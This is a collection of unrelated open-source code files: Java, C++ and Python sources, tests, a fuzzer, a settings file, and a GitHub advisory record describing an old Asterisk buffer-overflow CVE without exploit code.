     * http://localhost:8090/user/testRequiresRoles
     * Try with users user1 / user2 / admin; the password for each is <PASSWORD>.
     * @return map with code/msg and the user list, or the stack trace on failure
     */
    @RequiresRoles({"admin"})
    @RequestMapping(value = {"/testRequiresRoles"})
    @ResponseBody
    public Object testRequiresRoles() {
        Map<String, Object> result = new HashMap<>();
        try {
            List<User> users = userService.findAll();
            result.put("code", "200");
            result.put("msg", "success");
            result.put("result", users);
        } catch (Exception e) {
            result.put("code", "201");
            result.put("msg", ExceptionUtils.getFullStackTrace(e));
        }
        return result;
    }
    /**
     * Exercises @RequiresPermissions: only callers with the "delete" permission succeed.
     * http://localhost:8090/user/testRequiresPermissions
     * Try with users user1 / user2 / admin; the password for each is <PASSWORD>.
     *
     * @return map with code/msg and the user list
     */
    @RequestMapping(value = {"/testRequiresPermissions"})
    @ResponseBody
    @RequiresPermissions("delete")
    public Object testRequiresPermissions() {
        Map<String, Object> result = new HashMap<>();
        List<User> users = userService.findAll();
        result.put("code", "200");
        result.put("msg", "success");
        result.put("result", users);
        return result;
    }
    /**
     * Returns the current Shiro subject's principal info and session flags.
     * http://localhost:8090/user/userInfo
     *
     * @return map of principal(s), plus the remember-me flag
     */
    @RequestMapping(value = {"/userInfo"})
    @ResponseBody
    public Object user() {
        Map<String, Object> result = new HashMap<>();
        Subject subject = SecurityUtils.getSubject();
        result.put("subject.getPrincipal()", subject.getPrincipal());
        result.put("subject.getPrincipals()", subject.getPrincipals());
        // authentication state of the current subject
        Boolean isAuthenticated = subject.isAuthenticated();
        System.out.println("用户认证状态:" + isAuthenticated);
        result.put("RememberMe:", subject.isRemembered());
        return result;
    }
}
856 | //
// Copyright © 2017 Arm Ltd. All rights reserved.
// SPDX-License-Identifier: MIT
//
#pragma once
#include <backendsCommon/Workload.hpp>
#include <arm_compute/runtime/IFunction.h>
#include <arm_compute/core/Error.h>
#include <arm_compute/runtime/CL/CLTensor.h>
namespace armnn
{
// Validates whether the CL backend can execute this depthwise convolution
// with the given tensor infos; returns an arm_compute::Status describing
// the first incompatibility, if any.
arm_compute::Status ClDepthwiseConvolutionWorkloadValidate(const TensorInfo& input,
                                                           const TensorInfo& output,
                                                           const DepthwiseConvolution2dDescriptor& descriptor,
                                                           const TensorInfo& weights,
                                                           const Optional<TensorInfo>& biases,
                                                           const ActivationDescriptor* activationDescriptor = nullptr);
// GPU (OpenCL) workload wrapping ACL's depthwise convolution function.
class ClDepthwiseConvolutionWorkload : public BaseWorkload<DepthwiseConvolution2dQueueDescriptor>
{
public:
    using BaseWorkload<DepthwiseConvolution2dQueueDescriptor>::m_Data;
    ClDepthwiseConvolutionWorkload(const DepthwiseConvolution2dQueueDescriptor& descriptor,
                                   const WorkloadInfo& info,
                                   const arm_compute::CLCompileContext& clCompileContext);
    void Execute() const override;
protected:
    // Configured ACL function; owns the compiled kernels.
    std::unique_ptr<arm_compute::IFunction> m_DepthwiseConvolutionLayer;
    // Weight/bias CL tensors, released once no longer needed.
    std::unique_ptr<arm_compute::CLTensor> m_KernelTensor;
    std::unique_ptr<arm_compute::CLTensor> m_BiasTensor;
    void FreeUnusedTensors();
};
} //namespace armnn
325 | <filename>cli/src/main/java/com/box/l10n/mojito/cli/command/checks/GlossaryCaseCheckerSearchResult.java
package com.box.l10n.mojito.cli.command.checks;
import java.util.List;
/**
 * Holds the outcome of a glossary-case check for a single source string.
 * A freshly constructed result reports success with no failures recorded.
 */
class GlossaryCaseCheckerSearchResult {

    final String source;
    List<String> failures;
    boolean isSuccess;
    boolean isMajorFailure;

    public GlossaryCaseCheckerSearchResult(String source) {
        this.source = source;
        this.isSuccess = true;
    }

    public String getSource() {
        return this.source;
    }

    public List<String> getFailures() {
        return this.failures;
    }

    public boolean isMajorFailure() {
        return this.isMajorFailure;
    }

    public boolean isSuccess() {
        return this.isSuccess;
    }
}
| 280 |
5,250 | <gh_stars>1000+
/* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.flowable.cmmn.test.listener;
import org.flowable.task.service.delegate.DelegateTask;
import org.flowable.task.service.delegate.TaskListener;
import org.flowable.task.service.impl.persistence.entity.TaskEntityImpl;
/**
* @author martin.grofcik
*/
public class TestTaskOriginalAssigneeListener implements TaskListener {

    @Override
    public void notify(DelegateTask delegateTask) {
        // Record the task id plus the previous/current assignee as variables
        // so tests can assert on them later.
        TaskEntityImpl taskEntity = (TaskEntityImpl) delegateTask;
        delegateTask.setVariable("taskId", delegateTask.getId());
        delegateTask.setVariable("previousAssignee", taskEntity.getOriginalAssignee());
        delegateTask.setVariable("currentAssignee", delegateTask.getAssignee());
    }
}
| 368 |
2,542 | <filename>src/prod/src/client/StartNodeResult.h
// ------------------------------------------------------------
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License (MIT). See License.txt in the repo root for license information.
// ------------------------------------------------------------
#pragma once
namespace Client
{
    // Client-side wrapper for the result of a StartNode fault-analysis
    // operation; owns the StartNodeStatus it was constructed from.
    class StartNodeResult
        : public Api::IStartNodeResult
        , public Common::ComponentRoot
    {
        DENY_COPY(StartNodeResult);
    public:
        StartNodeResult(
            __in Management::FaultAnalysisService::StartNodeStatus && nodeStatus);
        // Returns the node result held by the wrapped status.
        std::shared_ptr<Management::FaultAnalysisService::NodeResult> const & GetNodeResult() override;
    private:
        Management::FaultAnalysisService::StartNodeStatus nodeStatus_;
    };
}
| 254 |
892 | <reponame>westonsteimel/advisory-database-github
{
"schema_version": "1.2.0",
"id": "GHSA-qx34-mm7f-757c",
"modified": "2022-05-01T18:32:26Z",
"published": "2022-05-01T18:32:26Z",
"aliases": [
"CVE-2007-5358"
],
"details": "Multiple buffer overflows in the voicemail functionality in Asterisk 1.4.x before 1.4.13, when using IMAP storage, might allow (1) remote attackers to execute arbitrary code via a long combination of Content-type and Content-description headers, or (2) local users to execute arbitrary code via a long combination of astspooldir, voicemail context, and voicemail mailbox fields. NOTE: vector 2 requires write access to Asterisk configuration files.",
"severity": [
],
"affected": [
],
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2007-5358"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/37051"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/37052"
},
{
"type": "WEB",
"url": "http://downloads.digium.com/pub/security/AST-2007-022.html"
},
{
"type": "WEB",
"url": "http://osvdb.org/38201"
},
{
"type": "WEB",
"url": "http://osvdb.org/38202"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/27184"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/archive/1/481996/100/0/threaded"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/26005"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id?1018804"
},
{
"type": "WEB",
"url": "http://www.vupen.com/english/advisories/2007/3454"
}
],
"database_specific": {
"cwe_ids": [
"CWE-119"
],
"severity": "MODERATE",
"github_reviewed": false
}
} | 876 |
1,811 | <reponame>fc1943s/Paket
{
"FSharp.excludeProjectDirectories": [
".git",
"paket-files",
"integrationtests/scenarios",
"packages"
]
}
| 90 |
407 | import sys
si = sys.stdin.readline  # fast input alias
n, c = list(map(int, si().split()))  # n: number of positions, c: items to place
a = []
for i in range(n):
    a.append(int(si()))  # one coordinate per line
def determination(D):
    """Greedy feasibility check: can c items be placed on the (sorted)
    positions in `a` so that every adjacent chosen pair is at least D apart?"""
    placed = 1
    last = a[0]
    for pos in a[1:]:
        if pos - last >= D:
            placed += 1
            last = pos
    return placed >= c
a.sort()  # greedy check requires sorted coordinates
# Binary search for the largest minimum gap D for which placement succeeds.
l, r, ans = 1, 1000000000, 0
while l <= r:
    mid = (l + r) // 2
    if determination(mid):
        ans = mid  # feasible: try a larger gap
        l = mid + 1
    else:
        r = mid - 1
print(ans)
14,668 | // Copyright 2021 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include <stddef.h>
#include <stdint.h>
#include <fuzzer/FuzzedDataProvider.h>
#include "base/at_exit.h"
#include "base/check.h"
#include "base/i18n/icu_util.h"
#include "extensions/common/url_pattern.h"
#include "url/gurl.h"
namespace extensions {
namespace {
// Process-wide state initialized once and reused across fuzzer iterations.
struct Environment {
  Environment() { CHECK(base::i18n::InitializeICU()); }
  // Initialize the "at exit manager" singleton used by the tested code.
  base::AtExitManager at_exit_manager;
};
}  // namespace
// Fuzzer entry point: builds a URLPattern with a fuzzed scheme mask, parses
// a fuzzed pattern string, and — when parsing succeeds — matches the pattern
// against a fuzzed URL.
extern "C" int LLVMFuzzerTestOneInput(const uint8_t* data, size_t size) {
  static Environment env;
  FuzzedDataProvider fuzzed_data_provider(data, size);
  URLPattern url_pattern(
      /*valid_schemes=*/fuzzed_data_provider.ConsumeIntegral<int>());
  if (url_pattern.Parse(fuzzed_data_provider.ConsumeRandomLengthString()) !=
      URLPattern::ParseResult::kSuccess) {
    return 0;
  }
  GURL url(fuzzed_data_provider.ConsumeRandomLengthString());
  url_pattern.MatchesURL(url);
  return 0;
}
}  // namespace extensions
| 416 |
3,200 | <filename>mindspore/python/mindspore/ops/operations/_embedding_cache_ops.py
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""cache_ops"""
from ..._checkparam import Validator as validator
from ...common import dtype as mstype
from ..primitive import prim_attr_register, PrimitiveWithCheck
from .. import signature as sig
class UpdateCache(PrimitiveWithCheck):
    """
    Update the value of input_x, similar to ScatterNdUpdate.
    The difference is that UpdateCache will not update when indices < 0 or indices >= max_num.
    Inputs:
        - **input_x** (Parameter) - Parameter which is going to be updated.
        - **indices** (Tensor) - Update indices of input_x.
        - **updates** (Tensor) - The update values.
    Outputs:
        - **out** (Tensor) - Returns a [1] Tensor, which is not useful.
    """
    __mindspore_signature__ = (
        sig.make_sig('input_x', sig.sig_rw.RW_WRITE,
                     dtype=sig.sig_dtype.T),
        sig.make_sig('indices', dtype=sig.sig_dtype.T1),
        sig.make_sig('updates', dtype=sig.sig_dtype.T),
        sig.make_sig('max_num', dtype=sig.sig_dtype.T1)
    )
    @prim_attr_register
    def __init__(self):
        """init UpdateCache"""
        self.init_prim_io_names(inputs=['input_x', 'indices', 'update', 'max_num'],
                                outputs=['out'])
    def check_shape(self, input_x_shape, indices_shape, update_shape, max_num_shape):
        # The kernel updates input_x in place; the declared output is a
        # fixed [1] placeholder tensor (see the class docstring).
        return [1]
    def check_dtype(self, input_x_dtype, indices_dtype, update_dtype, max_num_dtype):
        # Indices must be integer tensors; the output keeps input_x's dtype.
        validator.check_tensor_dtype_valid(
            "indices", indices_dtype, mstype.int_type, self.name)
        return input_x_dtype
class SubAndFilter(PrimitiveWithCheck):
    """
    Dynamic kernel: subtract an offset and
    return the elements that fall in the range [0, max_num).
    Inputs:
        - **input_x** (Tensor) - Input tensor.
        - **max_num** (Int) - The max value of an element after subtracting `offset`.
        - **offset** (int) - Specifies the offset value of this `input_x`.
    Outputs:
        tuple(Tensor), tuple of 2 tensors, filter_res and filter_idx.
        - **filter_res** (Tensor) - The result of `input_x` minus `offset`,
          restricted to values in the range [0, max_num).
        - **filter_idx** (Tensor) - A tensor containing indices of elements in the input
          corresponding to the output tensor.
    Supported Platforms:
        `CPU`
    Examples:
        >>> x = Tensor(np.array([1, 3, 5, 8, 9, 16]), mindspore.int32)
        >>> max_num = 10
        >>> offset = 5
        >>> output = ops.SubAndFilter()(x, max_num, offset)
        >>> print(output)
        (Tensor(shape=[3], dtype=Int32, value= [0, 3, 4]),
         Tensor(shape=[3], dtype=Int32, value= [2, 3, 4]))
    """
    @prim_attr_register
    def __init__(self):
        """init SubAndFilter"""
        self.init_prim_io_names(inputs=['input_x', 'max_num', 'offset'],
                                outputs=['sub_res', 'sub_idx'])
    def check_shape(self, input_x_shape, max_num_shape, offset_shape):
        # Output shapes are dynamic: they depend on how many elements
        # survive the [0, max_num) filter, hence -1.
        return ((-1,), (-1,))
    def check_dtype(self, input_x_dtype, max_num_dtype, offset_dtype):
        validator.check_tensor_dtype_valid(
            "input_x", input_x_dtype, mstype.int_type, self.name)
        return input_x_dtype
class MapUniform(PrimitiveWithCheck):
    """
    Map a tensor by using formula : value = key % `group_num` * `per_group_size` + key // `group_num`.
    Inputs:
        - **input** (Tensor) - Input Tensor.
        - **per_group_size** (int) - The size of each group.
        - **group_num** (int) - The number of group.
    Outputs:
        Tensor, has the same dtype and shape as the `input`.
    Supported Platforms:
        `CPU`
    Examples:
        >>> input_x = Tensor(np.array([0, 1, 2, 3, 4, 5, 6, 7]))
        >>> per_group_size = 4
        >>> group_num = 2
        >>> map_uniform = ops.MapUniform()
        >>> output = map_uniform(input_x, per_group_size, group_num)
        >>> print(output)
        [0, 4, 1, 5, 2, 6, 3, 7]
    """
    @prim_attr_register
    def __init__(self):
        """init MapUniform"""
        self.init_prim_io_names(inputs=['input', 'per_group_size', 'group_num'],
                                outputs=['output'])
    def check_dtype(self, input_dtype, per_group_size_dtype, group_num_dtype):
        # NOTE(review): unlike the sibling primitives this check returns no
        # dtype — presumably the framework falls back to the input dtype;
        # confirm against PrimitiveWithCheck.
        validator.check_tensor_dtype_valid(
            "input", input_dtype, mstype.int_type, self.name)
        validator.check_value_type(
            'per_group_size', per_group_size_dtype, [mstype.Int], self.name)
        validator.check_value_type(
            'group_num', group_num_dtype, [mstype.Int], self.name)
class CacheSwapTable(PrimitiveWithCheck):
    """
    Delete a hashmap entry, and insert a new key to hashmap, return the key and value of the deleted entry.
    Inputs:
        - **cache_table** (Parameter) - The cache table which is on device.
        - **swap_cache_idx** (Tensor) - The index of table which need to swap. -1 is skipped.
        - **miss_value** (int) - The values which are going to swap into cache table.
    Outputs:
        - **old_value** (Tensor) - The values which are swapped out.
    """
    __mindspore_signature__ = (
        sig.make_sig('cache_table', sig.sig_rw.RW_WRITE,
                     dtype=sig.sig_dtype.T),
        sig.make_sig('swap_cache_idx', dtype=sig.sig_dtype.T1),
        sig.make_sig('miss_value', dtype=sig.sig_dtype.T)
    )
    @prim_attr_register
    def __init__(self):
        """init CacheSwapTable"""
        self.init_prim_io_names(inputs=['cache_table', 'swap_cache_idx', 'miss_value'],
                                outputs=['old_value'])
    def check_shape(self, cache_table_shape, swap_cache_idx_shape, miss_value_shape):
        # The cache table must be 2-D: rows are cache slots.
        if len(cache_table_shape) != 2:
            raise ValueError(
                "cache table shape must be 2, but got %d" % len(cache_table_shape))
        # Swapped-out values mirror the shape of the incoming miss values.
        return miss_value_shape
    def check_dtype(self, cache_table_dtype, swap_cache_idx_dtype, miss_value_dtype):
        validator.check_tensor_dtype_valid(
            "swap_cache_idx", swap_cache_idx_dtype, mstype.int_type, self.name)
        return miss_value_dtype
class MapCacheIdx(PrimitiveWithCheck):
    """
    MapCacheIdx merges SearchCacheIdx, CacheSwapHashmap and UpdateCache together.
    Given an indices tensor, it outputs the cache indices found by searching the hashmap.
    """
    __mindspore_signature__ = (
        sig.make_sig('hashmap', sig.sig_rw.RW_WRITE,
                     dtype=sig.sig_dtype.T),
        sig.make_sig('indices', dtype=sig.sig_dtype.T),
        sig.make_sig('step', dtype=sig.sig_dtype.T),
        sig.make_sig('emb_max_num', dtype=sig.sig_dtype.T),
        sig.make_sig('cache_max_num', dtype=sig.sig_dtype.T)
    )
    @prim_attr_register
    def __init__(self):
        """init MapCacheIdx"""
        self.init_prim_io_names(inputs=['hashmap', 'indices', 'step', 'emb_max_num', 'offset'],
                                outputs=['cache_idx', 'old_emb_idx', 'miss_emb_idx', 'swap_cache_idx'])
    def __check__(self, hashmap, indices, step, emb_max_num, offset):
        # hashmap must be 2-D: one row per hash bucket.
        hashmap_shape = hashmap['shape']
        if len(hashmap_shape) != 2:
            raise ValueError("The dimension of 'hashmap' in SearchCacheIdx must be 2, "
                             "but got %d." % len(hashmap_shape))
        # cache_idx follows the indices shape; the other three outputs are
        # dynamically sized (-1).
        out_shape = (indices['shape'], -1, -1, -1)
        hashmap_dtype = hashmap['dtype']
        indices_dtype = indices['dtype']
        args = {"hashmap": hashmap_dtype, "indices": indices_dtype}
        validator.check_tensors_dtypes_same_and_valid(
            args, mstype.int_type, self.name)
        out_dtype = (hashmap_dtype, hashmap_dtype,
                     hashmap_dtype, hashmap_dtype)
        out = {'shape': out_shape,
               'dtype': out_dtype,
               'value': None}
        # Propagate dynamic-shape bounds when available, otherwise fall back
        # to the static indices shape (max) and zeros (min).
        if 'max_shape' in indices:
            out['max_shape'] = (indices['max_shape'], indices['max_shape'],
                                indices['max_shape'], indices['max_shape'])
        else:
            out['max_shape'] = (indices['shape'], indices['shape'],
                                indices['shape'], indices['shape'])
        if 'min_shape' in indices:
            out['min_shape'] = (indices['min_shape'], 0, 0, 0)
        else:
            out['min_shape'] = (0, 0, 0, 0)
        return out
class DynamicAssign(PrimitiveWithCheck):
    """
    Assigns `Parameter` with a value; the `value` can have a dynamic shape.
    Inputs:
        - **variable** (Parameter) - The `Parameter`.
        - **value** (Tensor) - The value to be assigned.
    Outputs:
        Tensor, has the same type as original `variable`.
    Supported Platforms:
        `CPU`
    """
    __mindspore_signature__ = (
        sig.make_sig('variable', sig.sig_rw.RW_WRITE, dtype=sig.sig_dtype.T),
        sig.make_sig('value', dtype=sig.sig_dtype.T)
    )
    @prim_attr_register
    def __init__(self):
        self.init_prim_io_names(inputs=['ref', 'value'], outputs=['output'])
    def check_dtype(self, variable, value):
        # When `variable` arrives as a ref key (a Parameter reference) its
        # dtype cannot be validated directly; only check plain tensors.
        if variable != mstype.type_refkey:
            validator.check_tensor_dtype_valid(
                "variable", variable, mstype.number_type, self.name)
        validator.check_scalar_or_tensor_types_same(
            {"value": value}, mstype.number_type, self.name)
class PadAndShift(PrimitiveWithCheck):
    """
    Pad a tensor with -1, and shift with a length.
    Inputs:
        - **input_x** (Tensor) - The input Tensor, which will be copied
          to `output`.
        - **cum_sum_arr** (Tensor) - The last value of cum_sum_arr is
          the pad length of output tensor, cum_sum_arr[shift_idx] is
          the start to shift, and cum_sum_arr[shift_idx+1] is the end.
        - **shift_idx** (Int) - The idx of cum_sum_arr.
    if use python, PadAndShift is:
        output = [-1] * cum_sum_arr[-1]
        start = cum_sum_arr[shift_idx]
        end = cum_sum_arr[shift_idx + 1]
        output[start:end] = input_x[:(end-start)]
    Outputs:
        Tensor, has the same type as `input_x`.
    Supported Platforms:
        `CPU`
    Examples:
        >>> input_x = Tensor(np.array([9, 13, -1, -1, -1, -1, -1, -1]), mstype.int32)
        >>> cum_sum_arr = Tensor(np.array([0, 3, 5]), mstype.int32)
        >>> shift_idx = 1
        >>> pad_and_shift = ops.PadAndShift()
        >>> output = pad_and_shift(input_x, cum_sum_arr, shift_idx)
        >>> print(output)
        [-1, -1, -1, 9, 13]
    """
    @prim_attr_register
    def __init__(self):
        self.init_prim_io_names(
            inputs=['input_x', 'cum_sum_arr', 'shift_idx'], outputs=['output'])
    def check_shape(self, input_x_shape, cum_sum_arr_shape, shift_idx_shape):
        # NOTE(review): the declared output shape mirrors input_x, while the
        # pseudo-code above sizes the output by cum_sum_arr[-1] — confirm
        # this is resolved at runtime by the kernel.
        return input_x_shape
    def check_dtype(self, input_x_dtype, cum_sum_arr_dtype, shift_idx_dtype):
        return input_x_dtype
| 5,243 |
319 | <reponame>Hengle/face-nn<gh_stars>100-1000
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: penghuailiang
# @Date : 2019-09-27
import cv2
import os
import shutil
import numpy as np
import util.logit as log
from util.exception import NeuralException
def rm_dir(path):
    """
    Remove a directory tree (the directory itself, its files and subfolders).

    :param path: directory path
    """
    try:
        if os.path.exists(path):
            log.warn("rm directory %s", path)
            shutil.rmtree(path)
        else:
            log.warn("not exist directory: %s", path)
    except IOError as e:
        # Fix: the old message was copy-pasted from the imitator loader and
        # passed `e` as a stray positional arg instead of formatting it.
        log.error("io error, rm_dir failed {0}".format(e))
def clear_folder(dir):
    """
    Empty a directory: remove all files and subdirectories inside it,
    keeping the directory itself.

    :param dir: directory path
    """
    try:
        if os.path.exists(dir):
            # bottom-up walk so child files are removed before their directories
            for root, dirs, files in os.walk(dir, topdown=False):
                for name in files:
                    os.remove(os.path.join(root, name))
                for name in dirs:
                    os.rmdir(os.path.join(root, name))
        else:
            log.warn("not exist directory: %s", dir)
    except IOError as e:
        # Fix: message previously said "load imitator failed" (copy-paste error)
        log.error("io error, clear_folder failed {0}".format(e))
def clear_files(dir):
    """
    Remove only the files under `dir` (recursively); subdirectories are kept.
    If the directory does not exist, create it.

    :param dir: directory path
    """
    try:
        if os.path.exists(dir):
            for root, dirs, files in os.walk(dir, topdown=False):
                for name in files:
                    os.remove(os.path.join(root, name))
        else:
            log.warn("not exist directory: %s, create new", dir)
            os.mkdir(dir)
    except IOError as e:
        # Fix: message previously said "load imitator failed" (copy-paste error)
        log.error("io error, clear_files failed {0}".format(e))
def get_imit_cp(dir, ext=None):
    """
    Find the most recently modified checkpoint file in a directory.

    :param dir: search directory
    :param ext: optional filename suffix filter (e.g. ".ckpt"); None matches all
    :return: path of the newest matching file, or None if no match / on IO error
    """
    try:
        m_time = 0
        rst = None
        for file in os.listdir(dir):
            path = os.path.join(dir, file)
            mtime = os.path.getmtime(path)
            match = ext is None or file.endswith(ext)
            if match and (rst is None or mtime > m_time):
                m_time = mtime
                rst = path
        return rst
    except IOError as e:
        # Fix: exception detail was previously discarded; also return None
        # explicitly so the error path is obvious to callers.
        log.error("get_imit_cp, io error {0}".format(e))
        return None
def generate_file(path, content):
    """
    Write binary content to a file, creating parent directories if needed.

    :param path: file path
    :param content: file content (bytes)
    """
    try:
        # BUG fix: os.path.pardir is the string "..", not a function; the
        # original `os.path.pardir(path)` raised TypeError on every call.
        # Also check/create the *parent directory*, not the file path itself.
        parent = os.path.dirname(path)
        if parent and not os.path.exists(parent):
            os.makedirs(parent)
        # context manager guarantees the handle is closed even on write error
        with open(path, 'bw') as f:
            f.write(content)
    except IOError as e:
        log.error("io error, generate_file failed {0}".format(e))
def to_gray(rgb):
    """
    Convert a multi-channel array to gray by averaging over channel axis 2.

    :param rgb: array of rank >= 3 with channels on axis 2
    :return: array with a trailing singleton channel axis
    :raises NeuralException: if the input has fewer than 3 dimensions
    """
    if len(rgb.shape) < 3:
        raise NeuralException("to gray error")
    return np.expand_dims(np.mean(rgb, axis=2), axis=2)
def fill_gray(image):
    """
    Normalize channel count: [W, H] or [W, H, 1] -> [W, H, 3].
    A 3-channel image is collapsed to its per-pixel mean ([W, H]);
    any other channel count is returned unchanged.

    :param image: input image array
    :return: converted image
    """
    img = image if len(image.shape) != 2 else image[:, :, np.newaxis]
    channels = img.shape[2]
    if channels == 1:
        # replicate the single channel into three via edge padding
        return np.pad(img, ((0, 0), (0, 0), (1, 1)), 'edge')
    if channels == 3:
        return np.mean(img, axis=2)
    return img
def tensor_2_image(tensor):
    """
    Convert a batched tensor into a list of numpy images usable by cv2.

    :param tensor: tensor of shape [batch, C, W, H]
    :return: list of numpy arrays of shape [W, H, C], values scaled by 255
    """
    images = []
    for sample in tensor:
        arr = sample.cpu().detach().numpy()
        # [C, W, H] -> [W, H, C]; same result as two successive swapaxes calls
        arr = np.transpose(arr, (1, 2, 0))
        images.append(arr * 255)
    return images
def save_img(path, tensor1, tensor2):
    """
    Save a preview image built from the first sample(s) of two batches.

    :param path: output file path
    :param tensor1: tensor of shape [Batch, C, W, H]
    :param tensor2: tensor of shape [Batch, C, W, H]
    :raises NeuralException: if the batches are empty
    """
    batch1 = tensor_2_image(tensor1)
    batch2 = tensor_2_image(tensor2)
    if len(batch1) == 0:
        raise NeuralException("tensor error")
    if len(batch1) == 1:
        # a single pair: place them side by side
        merged = merge_image(batch1[0], batch2[0], mode='h')
    else:
        # two or more samples: 2x2 grid of the first two pairs
        merged = merge_4image(batch1[0], batch2[0], batch1[1], batch2[1])
    cv2.imwrite(path, merged)
def merge_image(image1, image2, mode="h", size=512, show=False, transpose=True):
    """
    Concatenate two images into one.

    :param image1: numpy array
    :param image2: numpy array
    :param mode: 'h' for horizontal concat, 'v' for vertical concat
    :param size: output resolution; each input is resized to size/2 per side
    :param show: display the result in a cv2 window
    :param transpose: swap width and height (cv2 order is [H, W, C])
    :return: numpy array, or None for an unknown mode
    """
    size_ = (int(size / 2), int(size / 2))
    img1_ = cv2.resize(image1, size_)
    img2_ = cv2.resize(image2, size_)
    if mode == 'h':
        image = np.append(img1_, img2_, axis=1)  # (256, 512, 3)
    elif mode == 'v':
        image = np.append(img1_, img2_, axis=0)
    else:
        # BUG fix: the original called .format() on a "%s" pattern, so the
        # mode value was never substituted into the log message.
        log.warn("not implements mode: {0}".format(mode))
        return None
    if transpose:
        image = image.swapaxes(0, 1)
    if show:
        cv2.imshow("contact", image)
        cv2.waitKey()
        cv2.destroyAllWindows()
    return image
def merge_4image(image1, image2, image3, image4, size=512, show=False, transpose=True):
    """
    Merge four images into a 2x2 grid (1 and 2 on top, 3 and 4 below).

    :param image1: input image1, numpy array
    :param image2: input image2, numpy array
    :param image3: input image3, numpy array
    :param image4: input image4, numpy array
    :param size: output resolution; each tile is resized to size/2 per side
    :param show: display the result in a cv2 window
    :param transpose: swap width and height (cv2 order is [H, W, C])
    :return: merged image
    """
    tile = (int(size / 2), int(size / 2))
    resized = [cv2.resize(img, tile) for img in (image1, image2, image3, image4)]
    top = np.append(resized[0], resized[1], axis=1)
    bottom = np.append(resized[2], resized[3], axis=1)
    image = np.append(top, bottom, axis=0)
    if transpose:
        image = image.swapaxes(0, 1)
    if show:
        cv2.imshow("contact", image)
        cv2.waitKey()
        cv2.destroyAllWindows()
    return image
| 3,243 |
1,296 | /**
* (c) 2019 by Mega Limited, Wellsford, New Zealand
*
* This file is part of the MEGA SDK - Client Access Engine.
*
* Applications using the MEGA API must present a valid application key
* and comply with the the rules set forth in the Terms of Service.
*
* The MEGA SDK is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
*
* @copyright Simplified (2-clause) BSD License.
*
* You should have received a copy of the license along with this
* program.
*/
#include <gtest/gtest.h>
#include <mega/share.h>
// Asserts field-by-field equality of two NewShare instances, including a
// byte-wise comparison of the SymmCipher::BLOCKSIZE-byte share key.
void checkNewShares(const mega::NewShare& exp, const mega::NewShare& act)
{
    ASSERT_EQ(exp.h, act.h);
    ASSERT_EQ(exp.outgoing, act.outgoing);
    ASSERT_EQ(exp.peer, act.peer);
    ASSERT_EQ(exp.access, act.access);
    ASSERT_EQ(exp.ts, act.ts);
    ASSERT_TRUE(std::equal(exp.key, exp.key + mega::SymmCipher::BLOCKSIZE, act.key));
    ASSERT_EQ(exp.have_key, act.have_key);
    ASSERT_EQ(exp.have_auth, act.have_auth);
    ASSERT_EQ(exp.pending, act.pending);
}
// Round-trip: serialize a Share, then unserialize it and verify that the
// resulting NewShare carries the original user, access level, timestamp,
// pending-contact id, and the externally supplied key.
TEST(Share, serialize_unserialize)
{
    mega::User user;
    user.userhandle = 42;
    mega::PendingContactRequest pcr{123};
    mega::Share share{&user, mega::RDONLY, 13, &pcr};
    std::string d;
    share.serialize(&d);
    // key is not part of the serialized blob; it is passed alongside
    mega::byte key[mega::SymmCipher::BLOCKSIZE];
    std::fill(key, key + mega::SymmCipher::BLOCKSIZE, 'X');
    auto data = d.c_str();
    auto newShare = std::unique_ptr<mega::NewShare>{mega::Share::unserialize(-1, 100, key, &data, d.data() + d.size())};
    const mega::NewShare expectedNewShare{100, -1, user.userhandle, mega::RDONLY, 13, key, NULL, 123};
    checkNewShares(expectedNewShare, *newShare);
}
// Backward-compatibility: unserialize a byte blob captured from a 32-bit
// Windows build and verify it decodes to the same NewShare as above.
TEST(Share, unserialize_32bit)
{
    // This is the result of serialization on 32bit Windows
    const std::array<char, 26> rawData = {
        0x2a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x7b, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00
    };
    const std::string d(rawData.data(), rawData.size());
    mega::byte key[mega::SymmCipher::BLOCKSIZE];
    std::fill(key, key + mega::SymmCipher::BLOCKSIZE, 'X');
    auto data = d.c_str();
    auto newShare = std::unique_ptr<mega::NewShare>{mega::Share::unserialize(-1, 100, key, &data, d.data() + d.size())};
    const mega::NewShare expectedNewShare{100, -1, 42, mega::RDONLY, 13, key, NULL, 123};
    checkNewShares(expectedNewShare, *newShare);
}
| 1,021 |
841 | <reponame>omolinab/jbpm
/*
* Copyright 2018 Red Hat, Inc. and/or its affiliates.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
